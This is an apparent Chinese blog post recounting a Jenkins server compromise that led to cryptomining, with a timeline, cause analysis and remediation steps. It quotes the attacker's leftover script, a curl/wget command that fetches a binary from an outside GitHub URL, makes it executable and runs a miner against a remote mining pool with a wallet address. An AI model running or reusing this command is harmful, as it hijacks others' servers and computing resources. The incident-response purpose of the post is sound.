Jenkins漏洞导致Linux被挖矿

最新推荐文章于 2024-03-15 16:30:10 发布
最新推荐文章于 2024-03-15 16:30:10 发布
阅读量2.4k 收藏 1
点赞数
文章标签: java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/liar_____/article/details/124024828
版权

  1. 问题发现
  2. 2022-4-7 14:05:00 腾讯云报警CPU100%。
  3. 问题处理
  4. 2022-4-7 14:08:00 查找高CPU进程,发现是Jenkins上有一个服务正在消耗CPU。而且该服务无法停止,只能进行删除。CPU回归正常。
  5. 原因查找

腾讯云监控显示:2022-4-7 00:45:00——2022-4-7 14:19:00时间段内CPU占用100%。

1)、查找登录日志发现有异常,疑似暴力破解root密码。

2)、无法查找2022-4-7 00:45:00左右访问Jenkins的名单。

3)、查找删除的服务遗留文件,发现有脚本残留,脚本如下。在github上下载该脚本,在对其放开运行权限,进行挖矿。GitHub上这个账号代码仓库里都是通过Jenkins破解的,截图如下。

curl -L --insecure --connect-timeout 5 --max-time 40 --fail http://raw.githubusercontent.com/anw1012/yw/main/xxxx -o xxxx 2> /dev/null || wget --no-check-certificate --timeout 40 --tries 1 http://raw.githubusercontent.com/anw1012/yw/main/xxxx -O xxxx 2> /dev/null || _curl http://raw.githubusercontent.com/anw1012/yw/main/xxxx > xxxx

chmod 777 *

./xxxx -a yespower -o stratum+tcps://51.79.177.216:17017  -u web1q7qdp8wlhpkd0p05md9eqjpp4z89nd5rx2djdwm.B77PLin;

 

4、问题解决

1)、对暴力破解root密码的IP进行拦截。

2)、Jenkins密码更改。

3)、Jenkins升级到最新版本。2.292.0升级到:2.332.2

4)、删除Jenkins无用的插件和更新插件。

5)、删除矿机程序。

6)、检查是否有恶意定时任务,检测到一个,进行删除。

5、参考文章

1、jenkins漏洞导致服务器中了挖矿病毒!cpu飙高351%!看我如何消灭它!

2、黑客攻击Jenkins漏洞(CVE-2018-1000861)传播Kerberods挖矿软件

WALL-E/
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Jenkins(二)配置slave
持之以恒,不需要特别的关注,成为持续不间断的坚持
01-13 1639
一、环境; 操作系统:CentOS release 6.7 (Final) 二、配置:在作为slave机器上操作: 1、创建jenkins用户 [root@test-service01 ~]# sudo /usr/sbin/useradd -m jenkins -d /home/jenkins 2、查看jenkins用户及组的信息 [root@test-service01 ~]# id
jenkins2.389Linux安装包
10-17
jenkins2.389Linux安装包
今天,你的服务器被“”了吗?
weixin_34010566的博客
06-10 412
本文作者:晨光 运维工程师 web服务应用是最为常见的应用之一,主要是通过对公网放行服务器的端口供客户访问来提供服务。这类服务对数据安全、访问控制的要求会比较高。但最为核心的还是后端服务器主机层,当后端主机不能正常工作时,前端展示的web服务一定是收到牵连的,如何维护后端服务器正常运行就显得尤为重要了。 这里提到后端主机的正常运行,就不得不提“***”这个词了,让互联网小白一筹莫展的无形杀手。他...
记一次服务器被的排查过程:xmrig病毒
矮矮的夏祭的专栏
07-11 6842
服务器被,记录一下清除xmrig病毒的解决过程
一款Jenkins的综合漏洞利用工具-JenkinsExploit-GUI
最新发布
siu~
03-15 1453
一款Jenkins的综合漏洞利用工具
JenkinsJenkins在CentOS和k8s(minikube)上的部署记录
Code Metaverse
04-29 3672
目录一、版本说明二、部署步骤三、启动四、初始配置五、k8s下的安装启动minikube创建命名空间通过Helm安装jenkins创建持久卷存储数据创建jenkins用户安装 Jenkins六、总结 一、版本说明 CentOS Linux 7 Jenkins 2.332.2 minikube version: v1.25.2 MacOS 12.3.1 二、部署步骤 sudo wget -O /etc/yum.repos.d/jenkins.repo https://pkg.jenkins.
Ubuntu | ERROR: ld.so: object ‘/usr/lib64/libthread.so.1‘ from /etc/ld.so.preload cannot be preloade
我是一块小石头
02-07 3677
错误一览 ERROR: ld.so: object '/usr/lib64/libthread.so.1' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored. root@xxx:~# root@xxx:~# ls ERROR: ld.so: object '/usr/lib64/libthread.so.1' from /etc/ld.so.preload cannot be prel
记一次服务器被利用jenkins经历-updatejenkins
qq_39126658的博客
11-20 460
图中UpdateJenkins 就是者创建的任务,应该是Jenkins账号密码太简单了,直接被破解了,登录之后创建了这个任务,会定时(******)执行下面shell脚本。应该是有一些反制手段的,可以刷下这个接口啥的,但不是很会,就没弄了。直接删除掉这个任务就好,然后改jenkins密码,改复杂一点。服务器被利用jenkins启动一个任务,不停跑某个程序。对方域名:auto.c3pool.org:13333。知道对方ip地址:118.189.172.141。
linux系统jenkins安装
qq_65442832的博客
03-08 86
linuxjenkins安装
jenkins设置执行时间_jenkins配置详解之——执行者数量
weixin_30753213的博客
02-06 258
jenkins上的执行者数量的设置并不是随意设置的,位置如下:他是跟cpu核数密切相关的,原则上是不能操作cpu的核数的,如果查看cpu的核数呢,命令如下:# 查看物理CPU个数cat /proc/cpuinfo| grep "physical id"| sort| uniq| wc -l# 查看每个物理CPU中core的个数(即核数)cat /proc/cpuinfo| grep "cpu co...
漏洞分析|死磕Jenkins漏洞回显与利用效果
m0_46699477的博客
06-28 1223
本文以 Jenkins 反序列化漏洞作为优化案例,分享我们的解决漏洞问题的方式。
Linux运维安全:公司内网服务器被埋了一台机,用我的经历来告诉你怎么干它!
我先测了
03-08 1649
目前猜测是这样的,可能是这个端口暴露了,因为没在在其他虚拟机发现机,也没再开放其他端口。总结:不改变原来jenkins一键构建部署的方式,只需要将开放公网端口修改一下,不那么容易被识破,再让开发同事将配置文件的端口统一修改即可。想起linux运维安全的后怕,检查有谁在什么时候连接过服务器,history检查历时命令,可能的情况是黑客比较谨慎,什么足迹都没留下。排查原因:端口开放的错误,但是又会影响其他环境的使用;tips:本地管家有保护系统的程序,检测到文件有病毒,所以懂的,这是一台机无疑!
jenkins 执行远程linux命令
08-15
jenkins 执行远程linux命令,jenkins 执行远程linux命令,jenkins 执行远程linux命令
Jenkins部署Linux内线插件包
01-29
Jenkins离线包 yarn/node/jdk/maven,包括32个常用离线插件
jenkins linux版本
09-14
jenkins的war包,解压rar后将war包通过ssh复制到服务器中,在服务器中找到指定目录,然后java -jar jekins.war,即可运行jekins,然后通过服务器地址:9000就可以打开jekins.
LinuxJenkins忘记密码的操作步骤
09-14
主要介绍了LinuxJenkins忘记密码的操作步骤,本文给大家介绍的非常详细,具有一定的参考借鉴价值,需要的朋友可以参考下
我的服务器被了,原因居然是...
qq_44005305的博客
06-24 924
比特币系统每隔一段时间就会在节点上生成一个随机代码,互联网中的所有设备都可以寻找这个代码,谁先找到就能获得奖励。而寻找代码的过程,就是。设备通过计算来筛选出符合条件的随机代码,每找到一个随机代码往往需要上万亿次的哈希运算,CPU通常会被顶到100%。为了降低成本,黑客往往会通过入侵的方式,控制别人的计算机来帮自己
解决阿里云服务器被植入脚本过程
拽着尾巴的鱼儿的博客
06-21 3571
基于学习的便利性,在阿里云服务中购买了云服务器,但是突然被告警提示被,而且要在一定期限内解决问题,否则就会被关停服务,本篇对于其处理过程进行一个记录,可能对于的处理也不全面,欢迎各路大神进行评论交流。以上就是今天要讲的内容,本文仅仅简单记录了处理服务器的流程,记录的不全面,欢迎各路大神探讨交流。
Jenkins之部署
weixin_42022218的博客
05-01 2291
一、环境准备 centos7 jenkins 2.332.2 java 11 二、部署步骤 wget -O /etc/yum.repos.d/jenkins.repo https://pkg.jenkins.io/redhat-stable/jenkins.repo --no-check-certificate 会提示证书过期,加上–no-check-certificate rpm --import https://pkg.jenkins.io/redhat-stable/jenkins.io.ke
jenkins 漏洞如何排查
02-01
然而,由于Jenkins的广泛使用和开放的插件生态系统,可能存在一些安全漏洞。下面是一些排查Jenkins漏洞的常见方法: 1. 定期更新Jenkins和插件:及时更新Jenkins和其插件是防止漏洞利用的重要步骤。Jenkins官方会...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值